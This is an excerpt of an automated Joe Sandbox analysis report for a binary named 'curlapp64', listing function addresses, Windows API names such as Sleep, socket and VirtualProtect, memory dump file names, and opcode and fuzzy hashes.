                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                • Opcode ID: 3438edb8662da19bc615d821af10cf71c0ff8469271a0d978bd50ef382c822a1
                                                                                                                                • Instruction ID: e023dfc1f3d2812984bcd0d15cfd82886c38e2247cc4ddde7d9990482714b99e
                                                                                                                                • Opcode Fuzzy Hash: 3438edb8662da19bc615d821af10cf71c0ff8469271a0d978bd50ef382c822a1
                                                                                                                                • Instruction Fuzzy Hash: 93315A25E0824345FA54AFA5B4713B96291AF82746F4850F8DACECB7D3DE2DE844C394
                                                                                                                                Function 00007FF6CABE28C8 Relevance: 4.6, APIs: 3, Instructions: 66COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2016263034-0
                                                                                                                                • Opcode ID: 919e04b9d9b0c19205b013ca1f75545f09ace57d86454eb7d7f803c1edc4869e
                                                                                                                                • Instruction ID: b10f8b714e89ec59fa78de4a08a0e27d6d178c645927b1071d69cb12182bec4a
                                                                                                                                • Opcode Fuzzy Hash: 919e04b9d9b0c19205b013ca1f75545f09ace57d86454eb7d7f803c1edc4869e
                                                                                                                                • Instruction Fuzzy Hash: 55217F26A08A4685EE149F21F86027927A0EF4AF95F5850B5CA8D83365CF3CE881C384
                                                                                                                                Function 00007FF8A93082D0 Relevance: 4.5, APIs: 3, Instructions: 37networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastSleepgetsockopt
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3033474312-0
                                                                                                                                • Opcode ID: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                                                                                • Instruction ID: 16462ec551aa162b5b9d6e234d4b24910a189cca188b02152ac89fda59533159
                                                                                                                                • Opcode Fuzzy Hash: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                                                                                • Instruction Fuzzy Hash: 8801713560DA8297E7508F51E44423AA7B0EB857C0F686075DB89C7E94DF7ED4458B00
                                                                                                                                Function 00007FF8A93187F0 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FF8A930AAE9), ref: 00007FF8A93187FB
                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FF8A930AAE9), ref: 00007FF8A9318821
                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FF8A930AAE9), ref: 00007FF8A9318835
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExclusiveLock$Release$Acquire
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1021914862-0
                                                                                                                                • Opcode ID: 5c02fb6c1fcb24a16d6f55f71e277d5c4db8b3561b8eb6c272e01fb65b4a3692
                                                                                                                                • Instruction ID: 7c884dd6a383ee1c1378f21ab3af59fde64f506220ff56f53ed16d95c1cf56da
                                                                                                                                • Opcode Fuzzy Hash: 5c02fb6c1fcb24a16d6f55f71e277d5c4db8b3561b8eb6c272e01fb65b4a3692
                                                                                                                                • Instruction Fuzzy Hash: 1FF0BD20E2EC83B5FA04AF11EC9527562B1FF98784F956031D50FC51A5EE2DE94AC740
                                                                                                                                Function 00007FF6CABF3670 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                • Opcode ID: b69bc3652b8b47cd3b0de207084e308296e446f90ea6cf065fa76555c4147a68
                                                                                                                                • Instruction ID: 049a9cc092979c1b205a3bd5c5c6fa5444d31ae8ae1b0037ad438c75b33752f2
                                                                                                                                • Opcode Fuzzy Hash: b69bc3652b8b47cd3b0de207084e308296e446f90ea6cf065fa76555c4147a68
                                                                                                                                • Instruction Fuzzy Hash: 00D0C96CB1864797EB082FB07CF92BA12315FADB03B0414BCC99B86352DD3D684C4250
                                                                                                                                Function 00007FF6CABC0390 Relevance: 3.8, APIs: 3, Instructions: 55sleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: 1ce4127e2e7c12c34186c6d80e1d9cfb398dc8e1d30225d72022c023aafcbb0b
                                                                                                                                • Instruction ID: e36eb4c7f6b98da855334b82f7df04f16044eafbe991bae6232dfa3ce632f78a
                                                                                                                                • Opcode Fuzzy Hash: 1ce4127e2e7c12c34186c6d80e1d9cfb398dc8e1d30225d72022c023aafcbb0b
                                                                                                                                • Instruction Fuzzy Hash: 4C112751B0D38A43EE58AB05B43157A5252AF8EBC5F449075EACE8BBC7DD2CE5415700
                                                                                                                                Function 00007FF8A9365F80 Relevance: 3.8, APIs: 3, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                • Opcode ID: a37464766f8cc36ff62fae178fc7976c0838dfec4ff49afa06ec2eac5bc2568f
                                                                                                                                • Instruction ID: 4753dea7498cebc9b10054fc51198e0711c4ae3e1995b8fdb6c2be89b3879612
                                                                                                                                • Opcode Fuzzy Hash: a37464766f8cc36ff62fae178fc7976c0838dfec4ff49afa06ec2eac5bc2568f
                                                                                                                                • Instruction Fuzzy Hash: 63012D7762AF91D2D7408F29E48012D77B4F748F98F095122EB4A87B18CF38C491C740
                                                                                                                                Function 00007FF6CABF7C20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                • API String ID: 544645111-2031265017
                                                                                                                                • Opcode ID: 57c7a51876b11055c6b42f450fda63c3126bdd844e7d2901bfabd072e448e2fd
                                                                                                                                • Instruction ID: d8b69eb7c2d4f629dc2fcc0321b750ffb221a3a3c79f80c18f9dcb6113a12f5c
                                                                                                                                • Opcode Fuzzy Hash: 57c7a51876b11055c6b42f450fda63c3126bdd844e7d2901bfabd072e448e2fd
                                                                                                                                • Instruction Fuzzy Hash: 0011D369A0864A52E6149FA2BC506B52220AB597B1F5847B4EEBC837D4DF7CE496C300
                                                                                                                                Function 00007FF6CABE3C98 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3548387204-0
                                                                                                                                • Opcode ID: a3ef34965dfb6b8f3097f7ec177bd014aa6d75d64200ca97a6e65aa3f7a76505
                                                                                                                                • Instruction ID: b988841bf0a313f8353133a7586493fcbd48a8ef1b25f2a6e9bf9a048e2c6097
                                                                                                                                • Opcode Fuzzy Hash: a3ef34965dfb6b8f3097f7ec177bd014aa6d75d64200ca97a6e65aa3f7a76505
                                                                                                                                • Instruction Fuzzy Hash: 2D11F218E0D14701FA547FB578B62B951804F47343F4415F8E9DECA2C3EE1DB8A246A2
                                                                                                                                Function 00007FF6CABFE3AC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6CABF3192), ref: 00007FF6CABFE3C0
                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF6CABF3192), ref: 00007FF6CABFE42A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnvironmentStrings$Free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3328510275-0
                                                                                                                                • Opcode ID: 01f681e56d95ee27087a3f5414cab926d0c4626119e720529a80bb7388a5a08c
                                                                                                                                • Instruction ID: db5b949c78bc81ea91314c493f4ee34549a2eec5956cbca9a3d22edbb08f8230
                                                                                                                                • Opcode Fuzzy Hash: 01f681e56d95ee27087a3f5414cab926d0c4626119e720529a80bb7388a5a08c
                                                                                                                                • Instruction Fuzzy Hash: 6A01C819F087A585EA219F51782407A6370EF59FE1F4C4278EFAD57BC9DE6CE4428340
                                                                                                                                Function 00007FF8A93243B0 Relevance: 3.0, APIs: 2, Instructions: 41networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: closesocketsocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2760038618-0
                                                                                                                                • Opcode ID: 1238c7659b95fc833f9519c1862ce9797862c3ae7edc575cb5769eb1a519b49b
                                                                                                                                • Instruction ID: d04dc3f5bd38b909f07fd3d63c267527c6aa380f1bb3d31950f67c951ee599fd
                                                                                                                                • Opcode Fuzzy Hash: 1238c7659b95fc833f9519c1862ce9797862c3ae7edc575cb5769eb1a519b49b
                                                                                                                                • Instruction Fuzzy Hash: D801D112B0AAC197FB448BA9A4893B91760DF60BB0F1CA278CA2D567D1CE6C48E58700
                                                                                                                                Function 00007FF8A9318EA0 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 17069307-0
                                                                                                                                • Opcode ID: 39a519f4624760cd79ac458549f5595ef9daf227755beea38229d5db3c9119c4
                                                                                                                                • Instruction ID: d8a7cbf56425905ad13e0aa259f87904a1b45e9348738d27cd491b80af6cb7eb
                                                                                                                                • Opcode Fuzzy Hash: 39a519f4624760cd79ac458549f5595ef9daf227755beea38229d5db3c9119c4
                                                                                                                                • Instruction Fuzzy Hash: E2D06724B1EA86A2EB04AF60AC950B51270EF58351B442035C95FC6361EE2CA99DC710
                                                                                                                                Function 00007FF8A93398C0 Relevance: 2.6, APIs: 2, Instructions: 84COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                • Opcode ID: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                                                                                • Instruction ID: 5829d8d13c99e35c0e36ca6028338be1e0bff6b2da6e5d5081c1177ea41881cf
                                                                                                                                • Opcode Fuzzy Hash: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                                                                                • Instruction Fuzzy Hash: E631A422B0EAC2E5EA58AF6695803BE63A2EF49BC4F441435EE4F83785DF2DD4508350
                                                                                                                                Function 00007FF8A933BA90 Relevance: 2.5, APIs: 2, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                • Opcode ID: 2364130e8387a22c3592681a25188552cd3fa5a9530cb017d00036b0f9dc0d87
                                                                                                                                • Instruction ID: b0f63e713e0bf16c8e459fe42e2665b7ae2a989a9670ca19898ac6b41b4b74e2
                                                                                                                                • Opcode Fuzzy Hash: 2364130e8387a22c3592681a25188552cd3fa5a9530cb017d00036b0f9dc0d87
                                                                                                                                • Instruction Fuzzy Hash: 11F03032119AC2C0C7508F35F9843E973A8FBACFC8F198035CE994A669CE7880908710
                                                                                                                                Function 00007FF6CABF3586 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                • Opcode ID: 360eecc09cc7c927c32e308d07e9fdaaea6b9da2091d04eac59be863e8c61b53
                                                                                                                                • Instruction ID: 5d62801a133c96212958dad90d16a8bdc2d4c75beb1366836a02f2c9551d99a3
                                                                                                                                • Opcode Fuzzy Hash: 360eecc09cc7c927c32e308d07e9fdaaea6b9da2091d04eac59be863e8c61b53
                                                                                                                                • Instruction Fuzzy Hash: 89218239E0864289EB609F74E8652FC37A0EF46719F08067DDAAD826C5DF39D445C750
                                                                                                                                Function 00007FF6CABF24E0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: 0428f7daac319404611c2444f1606148140d2481127d28af03691f15706ef5a8
                                                                                                                                • Instruction ID: 66896a1a3c5c8c0de89da792dab252c9e5805e3847014f217fffd567675cc58f
                                                                                                                                • Opcode Fuzzy Hash: 0428f7daac319404611c2444f1606148140d2481127d28af03691f15706ef5a8
                                                                                                                                • Instruction Fuzzy Hash: 3811D82DA1CA4182EA609F41B830179A260FF86B81F1C44B9EFCC87686DFBCD8514751
                                                                                                                                Function 00007FF6CAC03320 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
